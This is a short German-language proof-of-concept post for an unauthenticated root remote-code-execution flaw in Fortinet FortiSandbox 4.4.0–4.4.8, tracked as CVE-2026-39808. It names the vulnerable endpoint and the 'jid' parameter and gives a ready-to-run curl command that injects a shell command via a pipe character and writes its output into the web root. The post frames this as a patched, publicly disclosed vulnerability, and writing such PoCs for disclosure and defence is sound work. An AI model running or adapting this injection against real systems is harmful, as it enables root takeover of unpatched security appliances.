
PoC für nicht authentifizierte RCE in FortiSandbox über CVE-2026-39808
Im November 2025 wurde eine kritische Schwachstelle in Fortinets FortiSandbox entdeckt, die es einem nicht authentifizierten Angreifer ermöglichte, Befehle im zugrunde liegenden Betriebssystem als Root auszuführen. Die Schwachstelle wurde gepatcht und schließlich im April 2026 öffentlich gemacht.
Diese Schwachstelle betrifft FortiSandbox-Versionen 4.4.0 bis 4.4.8.
Lies die vollständige Sicherheitsmeldung hier.
Die Schwachstelle betrifft den Endpunkt /fortisandbox/job-detail/tracer-behavior. Betriebssystembefehle können über das Pipe-Symbol (|) im jid-GET-Parameter injiziert werden.
Im obigen Beispiel wurde die Ausgabe in eine Datei im Web-Root umgeleitet, sodass sie anschließend abgerufen werden kann.
Ein einfacher Curl-Befehl genügt, um ohne vorherige Authentifizierung als Root RCE zu erzielen:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"